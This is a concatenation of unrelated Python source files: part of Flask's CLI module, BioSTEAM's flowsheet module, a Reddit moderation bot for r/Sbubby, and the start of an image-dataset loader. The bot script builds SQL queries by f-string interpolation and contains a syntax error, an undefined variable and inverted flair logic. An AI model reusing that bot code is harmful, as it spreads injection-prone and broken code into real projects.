create_app=self.create_app, set_debug_flag=self.set_debug_flag
)
kwargs["obj"] = obj
kwargs.setdefault("auto_envvar_prefix", "FLASK")
return super().main(*args, **kwargs)
def _path_is_ancestor(path, other):
"""Take ``other`` and remove the length of ``path`` from it. Then join it
to ``path``. If it is the original value, ``path`` is an ancestor of
``other``."""
return os.path.join(path, other[len(path) :].lstrip(os.sep)) == other
def load_dotenv(path=None):
"""Load "dotenv" files in order of precedence to set environment variables.
If an env var is already set it is not overwritten, so earlier files in the
list are preferred over later files.
This is a no-op if `python-dotenv`_ is not installed.
.. _python-dotenv: https://github.com/theskumar/python-dotenv#readme
:param path: Load the file at this location instead of searching.
:return: ``True`` if a file was loaded.
.. versionchanged:: 1.1.0
Returns ``False`` when python-dotenv is not installed, or when
the given path isn't a file.
.. versionchanged:: 2.0
When loading the env files, set the default encoding to UTF-8.
.. versionadded:: 1.0
"""
if dotenv is None:
if path or os.path.isfile(".env") or os.path.isfile(".flaskenv"):
click.secho(
" * Tip: There are .env or .flaskenv files present."
' Do "pip install python-dotenv" to use them.',
fg="yellow",
err=True,
)
return False
# if the given path specifies the actual file then return True,
# else False
if path is not None:
if os.path.isfile(path):
return dotenv.load_dotenv(path, encoding="utf-8")
return False
new_dir = None
for name in (".env", ".flaskenv"):
path = dotenv.find_dotenv(name, usecwd=True)
if not path:
continue
if new_dir is None:
new_dir = os.path.dirname(path)
dotenv.load_dotenv(path, encoding="utf-8")
return new_dir is not None # at least one file was located and loaded
def show_server_banner(env, debug, app_import_path, eager_loading):
"""Show extra startup messages the first time the server is run,
ignoring the reloader.
"""
if os.environ.get("WERKZEUG_RUN_MAIN") == "true":
return
if app_import_path is not None:
message = f" * Serving Flask app {app_import_path!r}"
if not eager_loading:
message += " (lazy loading)"
click.echo(message)
click.echo(f" * Environment: {env}")
if env == "production":
click.secho(
" WARNING: This is a development server. Do not use it in"
" a production deployment.",
fg="red",
)
click.secho(" Use a production WSGI server instead.", dim=True)
if debug is not None:
click.echo(f" * Debug mode: {'on' if debug else 'off'}")
class CertParamType(click.ParamType):
"""Click option type for the ``--cert`` option. Allows either an
existing file, the string ``'adhoc'``, or an import for a
:class:`~ssl.SSLContext` object.
"""
name = "path"
def __init__(self):
self.path_type = click.Path(exists=True, dir_okay=False, resolve_path=True)
def convert(self, value, param, ctx):
if ssl is None:
raise click.BadParameter(
'Using "--cert" requires Python to be compiled with SSL support.',
ctx,
param,
)
try:
return self.path_type(value, param, ctx)
except click.BadParameter:
value = click.STRING(value, param, ctx).lower()
if value == "adhoc":
try:
import cryptography # noqa: F401
except ImportError:
raise click.BadParameter(
"Using ad-hoc certificates requires the cryptography library.",
ctx,
param,
)
return value
obj = import_string(value, silent=True)
if isinstance(obj, ssl.SSLContext):
return obj
raise
def _validate_key(ctx, param, value):
"""The ``--key`` option must be specified when ``--cert`` is a file.
Modifies the ``cert`` param to be a ``(cert, key)`` pair if needed.
"""
cert = ctx.params.get("cert")
is_adhoc = cert == "adhoc"
is_context = ssl and isinstance(cert, ssl.SSLContext)
if value is not None:
if is_adhoc:
raise click.BadParameter(
'When "--cert" is "adhoc", "--key" is not used.', ctx, param
)
if is_context:
raise click.BadParameter(
'When "--cert" is an SSLContext object, "--key is not used.', ctx, param
)
if not cert:
raise click.BadParameter('"--cert" must also be specified.', ctx, param)
ctx.params["cert"] = cert, value
else:
if cert and not (is_adhoc or is_context):
raise click.BadParameter('Required when using "--cert".', ctx, param)
return value
class SeparatedPathType(click.Path):
"""Click option type that accepts a list of values separated by the
OS's path separator (``:``, ``;`` on Windows). Each value is
validated as a :class:`click.Path` type.
"""
def convert(self, value, param, ctx):
items = self.split_envvar_value(value)
super_convert = super().convert
return [super_convert(item, param, ctx) for item in items]
@click.command("run", short_help="Run a development server.")
@click.option("--host", "-h", default="127.0.0.1", help="The interface to bind to.")
@click.option("--port", "-p", default=5000, help="The port to bind to.")
@click.option(
"--cert", type=CertParamType(), help="Specify a certificate file to use HTTPS."
)
@click.option(
"--key",
type=click.Path(exists=True, dir_okay=False, resolve_path=True),
callback=_validate_key,
expose_value=False,
help="The key file to use when specifying a certificate.",
)
@click.option(
"--reload/--no-reload",
default=None,
help="Enable or disable the reloader. By default the reloader "
"is active if debug is enabled.",
)
@click.option(
"--debugger/--no-debugger",
default=None,
help="Enable or disable the debugger. By default the debugger "
"is active if debug is enabled.",
)
@click.option(
"--eager-loading/--lazy-loading",
default=None,
help="Enable or disable eager loading. By default eager "
"loading is enabled if the reloader is disabled.",
)
@click.option(
"--with-threads/--without-threads",
default=True,
help="Enable or disable multithreading.",
)
@click.option(
"--extra-files",
default=None,
type=SeparatedPathType(),
help=(
"Extra files that trigger a reload on change. Multiple paths"
f" are separated by {os.path.pathsep!r}."
),
)
@pass_script_info
def run_command(
info, host, port, reload, debugger, eager_loading, with_threads, cert, extra_files
):
"""Run a local development server.
This server is for development purposes only. It does not provide
the stability, security, or performance of production WSGI servers.
The reloader and debugger are enabled by default if
FLASK_ENV=development or FLASK_DEBUG=1.
"""
debug = get_debug_flag()
if reload is None:
reload = debug
if debugger is None:
debugger = debug
show_server_banner(get_env(), debug, info.app_import_path, eager_loading)
app = DispatchingApp(info.load_app, use_eager_loading=eager_loading)
from werkzeug.serving import run_simple
run_simple(
host,
port,
app,
use_reloader=reload,
use_debugger=debugger,
threaded=with_threads,
ssl_context=cert,
extra_files=extra_files,
)
@click.command("shell", short_help="Run a shell in the app context.")
@with_appcontext
def shell_command() -> None:
"""Run an interactive Python shell in the context of a given
Flask application. The application will populate the default
namespace of this shell according to its configuration.
This is useful for executing small snippets of management code
without having to manually configure the application.
"""
import code
from .globals import _app_ctx_stack
app = _app_ctx_stack.top.app
banner = (
f"Python {sys.version} on {sys.platform}\n"
f"App: {app.import_name} [{app.env}]\n"
f"Instance: {app.instance_path}"
)
ctx: dict = {}
# Support the regular Python interpreter startup script if someone
# is using it.
startup = os.environ.get("PYTHONSTARTUP")
if startup and os.path.isfile(startup):
with open(startup) as f:
eval(compile(f.read(), startup, "exec"), ctx)
ctx.update(app.make_shell_context())
# Site, customize, or startup script can set a hook to call when
# entering interactive mode. The default one sets up readline with
# tab and history completion.
interactive_hook = getattr(sys, "__interactivehook__", None)
if interactive_hook is not None:
try:
import readline
from rlcompleter import Completer
except ImportError:
pass
else:
# rlcompleter uses __main__.__dict__ by default, which is
# flask.__main__. Use the shell context instead.
readline.set_completer(Completer(ctx).complete)
interactive_hook()
code.interact(banner=banner, local=ctx)
@click.command("routes", short_help="Show the routes for the app.")
@click.option(
"--sort",
"-s",
type=click.Choice(("endpoint", "methods", "rule", "match")),
default="endpoint",
help=(
'Method to sort routes by. "match" is the order that Flask will match '
"routes when dispatching a request."
),
)
@click.option("--all-methods", is_flag=True, help="Show HEAD and OPTIONS methods.")
@with_appcontext
def routes_command(sort: str, all_methods: bool) -> None:
"""Show all registered routes with endpoints and methods."""
rules = list(current_app.url_map.iter_rules())
if not rules:
click.echo("No routes were registered.")
return
ignored_methods = set(() if all_methods else ("HEAD", "OPTIONS"))
if sort in ("endpoint", "rule"):
rules = sorted(rules, key=attrgetter(sort))
elif sort == "methods":
rules = sorted(rules, key=lambda rule: sorted(rule.methods)) # type: ignore
rule_methods = [
", ".join(sorted(rule.methods - ignored_methods)) # type: ignore
for rule in rules
]
headers = ("Endpoint", "Methods", "Rule")
widths = (
max(len(rule.endpoint) for rule in rules),
max(len(methods) for methods in rule_methods),
max(len(rule.rule) for rule in rules),
)
widths = [max(len(h), w) for h, w in zip(headers, widths)]
row = "{{0:<{0}}} {{1:<{1}}} {{2:<{2}}}".format(*widths)
click.echo(row.format(*headers).strip())
click.echo(row.format(*("-" * width for width in widths)))
for rule, methods in zip(rules, rule_methods):
click.echo(row.format(rule.endpoint, methods, rule.rule).rstrip())
cli = FlaskGroup(
help="""\
A general utility script for Flask applications.
Provides commands from Flask, extensions, and the application. Loads the
application defined in the FLASK_APP environment variable, or from a wsgi.py
file. Setting the FLASK_ENV environment variable to 'development' will enable
debug mode.
\b
{prefix}{cmd} FLASK_APP=hello.py
{prefix}{cmd} FLASK_ENV=development
{prefix}flask run
""".format(
cmd="export" if os.name == "posix" else "set",
prefix="$ " if os.name == "posix" else "> ",
)
)
def main() -> None:
if int(click.__version__[0]) < 8:
warnings.warn(
"Using the `flask` cli with Click 7 is deprecated and"
" will not be supported starting with Flask 2.1."
" Please upgrade to Click 8 as soon as possible.",
DeprecationWarning,
)
# TODO omit sys.argv once https://github.com/pallets/click/issues/536 is fixed
cli.main(args=sys.argv[1:])
if __name__ == "__main__":
main()
|
_flowsheet.py
|
# -*- coding: utf-8 -*-
"""
As BioSTEAM objects are created, they are automatically registered. The `find` object allows the user to find any Unit, Stream or System instance. When `find` is called, it simply looks up the item and returns it.
"""
from graphviz import Digraph
from IPython import display
from .utils import Register, search_register
__all__ = ('find', 'Flowsheet')
def make_digraph(units, streams, **graph_attrs):
"""Return digraph of units and streams."""
# Create a digraph and set direction left to right
f = Digraph(format='svg')
f.attr(rankdir='LR', **graph_attrs)
# Set up unit nodes
UD = {} # Contains full description (ID and line) by ID
for u in units:
if hasattr(u, 'link_streams'): u.link_streams()
graphics = u._graphics
if not graphics.in_system:
continue # Ignore Unit
# Initialize graphics and make Unit node with attributes
Type = graphics.node_function(u) or u.line
name = u.ID + '\n' + Type
f.attr('node', **u._graphics.node)
f.node(name)
UD[u] = name
keys = UD.keys()
# Set attributes for graph and streams
f.attr('node', shape='rarrow', fillcolor='#79dae8',
style='filled', orientation='0', width='0.6',
height='0.6', color='black', peripheries='1')
f.attr('graph', splines='normal', overlap='orthoyx',
outputorder='edgesfirst', nodesep='0.15', maxiter='1000000')
f.attr('edge', dir='foward')
for s in streams:
if not s: continue # Ignore stream
oU = s._source
if oU:
oi = oU._outs.index(s)
dU = s._sink
if dU:
di = dU._ins.index(s)
# Make stream nodes / unit-stream edges / unit-unit edges
if oU not in keys and dU not in keys: pass
# Stream is not attached to anything
elif oU not in keys:
# Feed stream case
f.node(s.ID)
edge_in = dU._graphics.edge_in
f.attr('edge', arrowtail='none', arrowhead='none',
tailport='e', **edge_in[di])
f.edge(s.ID, UD[dU])
elif dU not in keys:
# Product stream case
f.node(s.ID)
edge_out = oU._graphics.edge_out
f.attr('edge', arrowtail='none', arrowhead='none',
headport='w', **edge_out[oi])
f.edge(UD[oU], s.ID)
else:
# Process stream case
edge_in = dU._graphics.edge_in
edge_out = oU._graphics.edge_out
f.attr('edge', arrowtail='none', arrowhead='normal',
**edge_in[di], **edge_out[oi])
f.edge(UD[oU], UD[dU], label=s.ID)
return f
def save_digraph(digraph, file, format):
if not file:
if format == 'svg':
x = display.SVG(digraph.pipe(format=format))
else:
x = display.Image(digraph.pipe(format='png'))
display.display(x)
else:
if '.' not in file:
file += '.' + format
img = digraph.pipe(format=format)
f = open(file, 'wb')
f.write(img)
f.close()
# %% Flowsheet search
class Flowsheets:
__getattribute__ = __getitem__ = object.__getattribute__
def __setattr__(self, key, value):
raise TypeError(f"'{type(self).__name__}' object does not support attribute assignment")
__setitem__ = __setattr__
def __iter__(self):
yield from self.__dict__.values()
def __delattr__(self, key):
if key == find.ID:
raise AttributeError('cannot delete main flowsheet')
else:
super().__delattr__(key)
def __repr__(self):
return f'Register:\n ' + '\n '.join([repr(i) for i in self])
class Flowsheet:
"""Create a Flowsheet object which stores references to all stream, unit, and system objects."""
#: [Register] All flowsheets.
flowsheet = Flowsheets()
def __init__(self, ID):
#: [Register] Contains all System objects as attributes.
self.system = Register()
#: [Register] Contains all Unit objects as attributes.
self.unit = Register()
#: [Register] Contains all Stream objects as attributes.
self.stream = Register()
#: [str] ID of flowsheet.
self._ID = ID
self.flowsheet.__dict__[ID] = self
def __setattr__(self, key, value):
if hasattr(self, '_ID'):
raise TypeError(f"'{type(self).__name__}' object does not support attribute assignment")
else:
super().__setattr__(key, value)
@property
def ID(self):
return self._ID
def diagram(self, kind='surface', file=None, format='svg', **graph_attrs):
"""Display all units and attached streams.
Parameters
----------
kind='surface' : Must be one of the following
* **'thorough':** Thoroughly display every unit.
* **'surface':** Display units and recycle systems.
* **'minimal':** Minimally display flowsheet as a box with feeds and products.
"""
if kind == 'thorough':
return self._thorough_diagram(file, format, **graph_attrs)
elif kind == 'surface':
return self._surface_diagram(file, format, **graph_attrs)
elif kind == 'minimal':
return self._minimal_diagram(file, format, **graph_attrs)
else:
raise ValueError(f"kind must be either 'thorough', 'surface', or 'minimal'.")
def _thorough_diagram(self, file, format, **graph_attrs):
units = list(self.unit)
units.reverse()
streams = set()
for u in units:
streams.update(u._ins)
streams.update(u._outs)
f = make_digraph(units, streams, **graph_attrs)
save_digraph(f, file, format)
def _minimal_diagram(self, file, format, **graph_attrs):
from . import _system, Stream
streams = list(self.stream)
feeds = set(filter(_system._isfeed, streams))
products = set(filter(_system._isproduct, streams))
product = Stream(None)
product._ID = ''
feed = Stream(None)
feed._ID = ''
_system._streamUnit('\n'.join([i.ID for i in feeds]),
None, feed)
_system._streamUnit('\n'.join([i.ID for i in products]),
product, None)
unit = _system._systemUnit(self.ID, feed, product)
unit.line = 'flowsheet'
unit.diagram(1, file, format, **graph_attrs)
def _surface_diagram(self, file, format, **graph_attrs):
from . import _system, Stream
units = set(self.unit)
StrUnit = _system._streamUnit
refresh_units = set()
for i in self.system:
if i.recycle and not any(sub.recycle for sub in i.subsystems):
outs = []
ins = []
feeds = []
products = []
for s in i.streams:
source = s._source
sink = s._sink
if source in i.units and sink not in i.units:
if sink: outs.append(s)
else: products.append(s)
refresh_units.add(source)
elif sink in i.units and source not in i.units:
if source: ins.append(s)
else: feeds.append(s)
refresh_units.add(sink)
if len(feeds) > 1:
feed = Stream(None)
feed._ID = ''
units.add(StrUnit('\n'.join([i.ID for i in feeds]),
None, feed))
ins.append(feed)
else: ins += feeds
if len(products) > 1:
product = Stream(None)
product._ID = ''
units.add(StrUnit('\n'.join([i.ID for i in products]),
product, None))
outs.append(product)
else: outs += products
subsystem_unit = _system._systemUnit(i.ID, ins, outs)
units.difference_update(i.units)
units.add(subsystem_unit)
sys = _system.System(None, units)
sys._thorough_diagram(file, format, **graph_attrs)
for i in refresh_units:
i._ins[:] = i._ins
i._outs[:] = i._outs
def __call__(self, ID):
"""Return requested biosteam item.
Parameters
----------
ID : str
ID of the requested item.
"""
ID = ID.replace(' ', '_')
obj = (search_register(self.stream, ID)
or search_register(self.unit, ID)
or search_register(self.system, ID))
if not obj: raise LookupError(f"no registered item '{ID}'")
return obj
def __str__(self):
return self.ID
def __repr__(self):
return f'<{type(self).__name__}: {self.ID}>'
class MainFlowsheet(Flowsheet):
"""Create a MainFlowsheet object which automatically registers biosteam objects as they are created."""
__slots__ = ()
@staticmethod
def set_flowsheet(flowsheet):
"""Set main flowsheet that is updated with new biosteam objects."""
if isinstance(flowsheet, Flowsheet):
object.__setattr__(find, '__dict__', flowsheet.__dict__)
else:
raise TypeError('flowsheet must be a Flowsheet object')
__setattr__ = Flowsheets.__setattr__
def __new__(cls):
raise TypeError('cannot create new find object.')
def __repr__(self):
return f'<{type(self).__name__}: {self.ID}>'
#: [find] Find BioSTEAM objects by ID.
find = object.__new__(MainFlowsheet)
find.set_flowsheet(Flowsheet('default'))
# %% Attempt at contantly rendered digraph
# #: [bool] True if flowsheet is contantly rendered
# self.live = True
# def _show_once(self):
# fig = plt.figure()
# plt.axis('off')
# f = open('diagram.png', 'wb')
# diagram = make_digraph(self.unit.values()).pipe(format='png')
# f.write(diagram)
# img = mpimg.imread('diagram.png')
# plt.imshow(img, interpolation='spline36')
# fig.show()
# # img = Image.open('diagram.png')
# # img.show()
# def _show(self):
# fig = plt.figure()
# plt.axis('off')
# f = open('diagram.png', 'wb')
# for i in range(3):
# diagram = make_digraph(self.unit.values()).pipe(format='png')
# f.write(diagram)
# img = mpimg.imread('diagram.png')
# plt.clf()
# plt.imshow(img, interpolation='spline36')
# fig.show()
# time.sleep(10)
# f.close()
# os.remove('diagram.png')
# def show(self):
# t1 = threading.Thread(target=self._show())
# t1.start()
|
main.py
|
# Sheen Patel
# u/SbubbyBot for the the mods of r/Sbubby
import threading # to be able to run in threads
import praw # all the reddit i/o
import os # to get enviroment variables containing secrets
import psycopg2 # used for postgresql database stuff
from datetime import timedelta # timedeltas for comparison
import arrow # better datetime
import time # for time.sleep
from dotenv import load_dotenv # need this to import env. vars
from sys import exit # to exit gracefully from Ctrl+c
from signal import signal, SIGINT # to exit gracefully from C
import re # regex for the modmail
from digiformatter import styles #VT-100 formatting for console text
import logging #logging
from digiformatter import logger as digilogger #better logging
import importlib.resources as pkg_resources # read files in reliably
import data # load resources from ./data
# Set up logging
logging.basicConfig(level=logging.INFO)
dfhandler = digilogger.DigiFormatterHandler()
logger = logging.getLogger("sbubbybot")
logger.handlers = []
logger.propagate = False
logger.addHandler(dfhandler)
styles.create("angry", fg="dark_orange", attr="bold", prefix="ANGY", showtime=True, showprefix=True)
# load env variables (only for locally testing, heroku takes care of it othewise)
load_dotenv()
# Setting this var to true will allow the bot to actually comment on the post and not dry-run.
PRODUCTION = False
# create the reddit instance for the bot to use
reddit = praw.Reddit(
user_agent='SbubbyBot v. 1.0 by u/CrazedPatel',
client_id=os.environ['client_id'],
client_secret=os.environ['client_secret'],
username=os.environ['reddit_username'],
password=os.environ['reddit_password'])
# mark the subreddit
sbubby = reddit.subreddit('sbubby')
# MAGIC_EYE_BOT's profile
# magicEye = reddit.redditor('MAGIC_EYE_BOT')
database = ""
# connect to the postgresql database
try:
database = psycopg2.connect(user="postgres", password=os.environ['database_password'],
database=os.environ["database_name"], host=os.environ["DATABASE_URL"], port="5432")
except Exception as err:
logger.error(err)
logger.warn("Error connecting normal way, try other way")
database = psycopg2.connect(os.environ['DATABASE_URL'], sslmode='require')
cur = database.cursor()
# Load the sunday message from file. (this only happens once so it's minimal impact on performance.)
sunday_message = pkg_resources.read_text(data, "sunday_message.txt")
def main():
# if True: # use this if for testing small things.
# for i in reddit.subreddit('finnkennedy').modmail.conversations(limit=20):
# print(i.subject)
# print("\t", i.obj_ids)
# return
logger.info("creating threads")
oneMinTimerThread = threading.Thread(target=oneMinTimerThreadFunc)
repostAndFlairThread = threading.Thread(target=repostAndFlairThreadFunc)
logger.info("starting threads")
oneMinTimerThread.start()
repostAndFlairThread.start()
logger.info("threads started")
def repostAndFlairThreadFunc():
logger.info("repost and flair thread started")
for submission in sbubby.stream.submissions():
# skip post if author is moderator
moderators = sbubby.moderator()
if submission.author in moderators:
continue
# only do the stuff if the post hasn't been clicked
if submission.clicked is False:
doFlair(submission)
commonRepost(submission)
# need to commit after each time because of other thread and bc forever for loop
database.commit()
def oneMinTimerThreadFunc():
logger.info("one Min Timer thread started")
while True:
# start timer
start = arrow.now()
# check for any flair stuff that needs to be checked up on
checkFlairDB()
howMuchKarmaModmail()
# attempt to do sunday sbubday, making sure there is no duplicates is handled in the function
attemptSundaySbubday()
# end timer
end = arrow.now()
desired_restart_time = start.shift(minutes=1)
time_remaining = desired_restart_time - end
time.sleep(max(0, time_remaining.total_seconds())) # sleep until its been one minute since start
def sundaySbubby():
logger.info("It is sunday. Sunday Sbubby started...")
# Get and remove the flair templates:
for flairTemp in sbubby.flair.templates:
print(flairTemp)
if flairTemp == "Eaten Fresh" or flairTemp == "IRL" or flairTemp == "Logoswap":
# found flair to remove -- now removing it!
if PRODUCTION: # only actually remove if production is on
sbubby.flair.templates.update(flairTemp["id"], mod_only=True)
# get the automod post.
# sort subreddit by new for author:AutoModerator
link = None
message = None
linkMessage = "Please see the comments for the post to request new Sbubbies."
for submission in sbubby.search("author:AutoModerator", sort="new", time_filter="day"):
# only want to use the first one because it is the most recent
link = submission
linkMessage = f"[Go to the latest request thread here to request a sbubby]({link.url})"
break
if link is None:
# we weren't able to find a link, so fail angrily!!!
styles.print("Could not find the Automoderator link! will use placeholder!", style = "angry")
message = sunday_message.format(linkMessage)
# with the message, now post it and sticky it. Unsticky the automod post
if PRODUCTION:
if link is not None:
if link.stickied:
link.mod.sticky(state=False)
submission = sbubby.submit("Sunday Sbubday is today!", selftext=message)
submission.mod.distinguish(how='yes', sticky=True) # stickies to the top
def unSundaySbubby():
# add flairs eaten Fresh, Logoswap, IRL,
# unsticky announcement post,
# resticky requests post
if PRODUCTION:
for flairTemp in sbubby.flair.templates:
if flairTemp == "Eaten Fresh" or flairTemp == "IRL" or flairTemp == "Logoswap":
# found flair to remove -- now removing it!
if PRODUCTION: # only actually remove if production is on
sbubby.flair.templates.update(flairTemp["id"], mod_only=False)
# unsticky my post by searching through all the stickied posts to find the one authored by me
for i in range(1, 5):
try:
stickied = sbubby.sticky(number=i)
if stickied.author == reddit.user.me():
stickied.mod.sticky(state=False)
except Exception as err:
logger.error(err)
break
# sticky most recent automod post.
for submission in sbubby.search("author:AutoModerator", sort="new", time_filter="week"):
submission.mod.sticky(state=True, bottom=False)
break
def attemptSundaySbubday():
logger.info("<Sunday Sbubday> Attempting to do a sunday sbubday activity!")
today = arrow.today("America/New_York").weekday()
# check whether there is a post. stickyNum = 0 means no post
stickyNum = 0
for i in range(1, 3):
try:
post = sbubby.sticky()
if "Sunday Sbubday" in post.title:
stickyNum = i
break # there is a post, no need to do anything.
except Exception as err:
logger.error(err)
logger.warn("no sticky at index ", i)
break # no more sticky posts, need to add post
logger.info(today)
if today == 6:
# sunday, check if already post, if not, post
logger.info("it is sunday")
if stickyNum == 0:
sundaySbubby()
elif today == 0:
# monday
logger.info("it is monday")
if stickyNum != 0:
unSundaySbubby()
def checkFlairDB():
logger.info("<Database> checking flair db")
cur.execute("select * from flairs;")
rows = cur.fetchall()
# row[0] = submission id, row[1] = time post created, row[2] = comment telling to flair id.
for row in rows:
epochTime = arrow.get(row[1])
now = arrow.now()
submission = reddit.submission(row[0]) # lazy instance of the thing
# check if the post should be removed, otherwise, do nothing
link_flair_text = 0
try:
link_flair_text = submission.link_flair_text
except Exception as err:
logger.error(err)
logger.warn("error could not get")
if now - epochTime > timedelta(minutes=10) and link_flair_text is None:
# remove the post.
logger.info("<Database> Post ", submission.id, " is past the time and has no flair.")
logger.info("<Database> Time's up! Remove post.")
# remove from database
cur.execute(f"DELETE from flairs where submission_id='{row[0]}';")
# do the comment thing
try:
if PRODUCTION:
comment_id = row[2]
if comment_id is None:
# need to find the real one
submission.comments.replace_more(limit=None)
for comment in submission.comments:
if comment.author == reddit.user.me():
comment_id = comment.id
logger.info("no comment found by me")
continue # continues with the next submission in db
reddit.comment(comment_id).delete()
if sbubby.user_is_moderator:
# remove post
submission.mod.remove(mod_note="Removed for lack of flair by sbubbybot")
submission.mod.send_removal_message("Hi! Your post was removed because it had no flair after 10 minutes of you being notified to flair your post. This messsage was sent automatically, if you think it's an error, send a modmail")
submission.unsave()
except Exception as err:
logger.error(err)
logger.warn("<Database> Could not do: post could have been deleted?? postid=", row[0])
elif submission.link_flair_text is None:
# there is a flair.
logger.info(f"<Database> {submission.id} already has flair, removing from db.")
cur.execute(f"DELETE from flairs where submission_id='{row[0]}';")
if PRODUCTION:
# remove the comment as the flair is set
comment_id = row[2]
if comment_id is None:
# need to find the real one
submission.comments.replace_more(limit=None)
for comment in submission.comments:
if comment.author == reddit.user.me():
comment_id = comment.id
logger.info("no comment found by me")
continue # continues with the next submission in db
reddit.comment(comment_id).delete()
database.commit() # once all the querys set, then execute all at once.
def doFlair(submission):
# check to see if flair first
logger.info("<Flair> Checking ", submission.id)
if submission.link_flair_text is None and submission.saved is False:
# check to see if post already been messaged
hasBeenMessaged = False
for comment in submission.comments:
if comment.author == reddit.user.me(): # if i have a top level comment then don't message
hasBeenMessaged = True
if not hasBeenMessaged:
submission.save()
logger.info(f"<Flair> message {submission.name} post to remind to flair!")
logger.info("<Flair> created on: ", submission.created_utc)
comment_id = None # only used if PRODUCTION is true, will still insert into db as None
if PRODUCTION:
# make a comment on this post.
comment = submission.reply("""# It seems you didn't flair your post!
Please flair your post now or it might get taken down!
This comment was made by a bot (contact me @ u/CrazedPatel)""")
if comment is not None:
comment_id = comment.id
cur.execute(f"INSERT INTO FLAIRS (submission_id, time_created, comment_id) VALUES ('{submission.id}', to_timestamp({submission.created_utc}), '{comment_id}') ON CONFLICT (submission_id) DO NOTHING")
else:
logger.info("<Flair> No need for flair message -- one already exists?")
def howMuchKarmaModmail():
logger.info("<Karma> Anti-\"how much karma\" bot started...")
ffor conversation in subreddit.modmail.conversations(limit=20):
# for each mail, check for specific keywords: "How much Karma" "Karma requirement" "Karma minimum"
# checks if the bot has already replied
hasBotReply = False;
for message in conversation.messages:
print(message.body_markdown)
if not hasBotReply:
hasBotReply = message.author == 'BingerKurgBot'
if hasBotReply:
break;
# will only reply if it hasn't already
if not hasBotReply:
firstMessage = conversation.messages[0]
messageBody = firstMessage.body_markdown
regex = r"karma.*minimum|minimum.*karma|How much.*karma|karma.*requirement|required.*karma"
regexmatch = re.search(regex, messageBody, flags=re.I)
if regexmatch:
# there is at least one occurence of this, so do thing
if PRODUCTION:
logger.info("How much karma modmail detected, sending reply to " + str(conversation))
conversation.reply("""Thank you for your message, but it seems that this message is asking about the Karma requirement to post on r/sbubby. The Karma minimum is to help prevent spam and is undisclosed to prevent trolls and spammers. **If your message is not about the required amount of karma but is for an approval request or another topic, don't worry, a human moderator will respond shortly.** However, you can go through our manual exemption process instead to post content as long as you make original sbubbies. The process is as follows:
1. Message us with a link to your removed post. **Don't delete your post, we won't be able to review or approve it if you delete it.**
1. A moderator will review your submission and asks questions if needed. If it can't be approved, we will explain how to make it acceptable to approve.
1. If the submission is accepted, you will receive a reply telling you your submission was approved. If you've completed the process 3 times successfully, you will receive an alert telling you that you are an approved user.
**Please note that you can only go through this process if you only post original sbubbies.**
Thanks :) This message was sent by the u/sbubbybot and is not perfect. We are working on improving it!""")
def commonRepost(submission):
logger.info("<Repost> Common reposts bot started...")
# TODO: Check each item in the imgur album -- if any is over the threshold:
# make a comment with the similarity amount, and then give link that it is similar to.
# mark post as spam(, and if user replies, then send modmail?)
def sigintHandler(signal, frame):
logger.warn(f"Received (most likely) Ctrl+C, exiting.")
database.close()
exit(0)
if __name__ == "__main__":
signal(SIGINT, sigintHandler)
main()
|
datasets.py
|
import glob
import math
import os
import random
import shutil
import time
from pathlib import Path
from threading import Thread
import cv2
import numpy as np
import torch
from PIL import Image, ExifTags
from torch.utils.data import Dataset
from tqdm import tqdm
from fuckutils.general import xyxy2xywh, xywh2xyxy, torch_distributed_zero_first
help_url = 'https://github.com/ultralytics/yolov5/wiki/Train-Custom-Data'
img_formats = ['.bmp', '.jpg', '.jpeg', '.png', '.tif', '.tiff', '.dng']
vid_formats = ['.mov', '.avi', '.mp4', '.mpg', '.mpeg', '.m4v', '.wmv', '.mkv']
# Get orientation exif tag
for orientation in ExifTags.TAGS.keys():
if ExifTags.TAGS[orientation] == 'Orientation':
break
def get_hash(files):
# Returns a single hash value of a list of files
return sum(os.path.getsize(f) for f in files if os.path.isfile(f))
def exif_size(img):
# Returns exif-corrected PIL size
s = img.size # (width, height)
try:
rotation = dict(img._getexif().items())[orientation]
if rotation == 6: # rotation 270
s = (s[1], s[0])
elif rotation == 8: # rotation 90
s = (s[1], s[0])
except:
pass
return s
def create_dataloader(path, imgsz, batch_size, stride, opt, hyp=None, augment=False, cache=False, pad=0.0, rect=False,
local_rank=-1, world_size=1):
# Make sure only the first process in DDP process the dataset first, and the following others can use the cache.
with torch_distributed_zero_first(local_rank):
dataset = LoadImagesAndLabels(path, imgsz, batch_size,
augment=augment, # augment images
hyp=hyp, # augmentation hyperparameters
rect=rect, # rectangular training
cache_images=cache,
single_cls=opt.single_cls,
stride=int(stride),
pad=pad)
batch_size = min(batch_size, len(dataset))
nw = min([os.cpu_count() // world_size, batch_size if batch_size > 1 else 0, 8]) # number of workers
train_sampler = torch.utils.data.distributed.DistributedSampler(dataset) if local_rank != -1 else None
dataloader = torch.utils.data.DataLoader(dataset,
batch_size=batch_size,
num_workers=nw,
sampler=train_sampler,
pin_memory=True,
collate_fn=LoadImagesAndLabels.collate_fn)
return dataloader, dataset
class LoadImages: # for inference
def __init__(self, path, img_size=640):
p = str(Path(path)) # os-agnostic
p = os.path.abspath(p) # absolute path
if '*' in p:
files = sorted(glob.glob(p)) # glob
elif os.path.isdir(p):
files = sorted(glob.glob(os.path.join(p, '*.*'))) # dir
elif os.path.isfile(p):
files = [p] # files
else:
raise Exception('ERROR: %s does not exist' % p)
images = [x for x in files if os.path.splitext(x)[-1].lower() in img_formats]
videos = [x for x in files if os.path.splitext(x)[-1].lower() in vid_formats]
ni, nv = len(images), len(videos)
self.img_size = img_size
self.files = images + videos
self.nf = ni + nv # number of files
self.video_flag = [False] * ni + [True] * nv
self.mode = 'images'
if any(videos):
self.new_video(videos[0]) # new video
else:
self.cap = None
assert self.nf > 0, 'No images or videos found in %s. Supported formats are:\nimages: %s\nvideos: %s' % \
(p, img_formats, vid_formats)
def __iter__(self):
self.count = 0
return self
def __next__(self):
if self.count == self.nf:
raise StopIteration
path = self.files[self.count]
if self.video_flag[self.count]:
# Read video
self.mode = 'video'
ret_val, img0 = self.cap.read()
if not ret_val:
self.count += 1
self.cap.release()
if self.count == self.nf: # last video
raise StopIteration
else:
path = self.files[self.count]
self.new_video(path)
ret_val, img0 = self.cap.read()
self.frame += 1
print('video %g/%g (%g/%g) %s: ' % (self.count + 1, self.nf, self.frame, self.nframes, path), end='')
else:
# Read image
self.count += 1
img0 = cv2.imread(path) # BGR
assert img0 is not None, 'Image Not Found ' + path
print('image %g/%g %s: ' % (self.count, self.nf, path), end='')
# Padded resize
img = letterbox(img0, new_shape=self.img_size)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
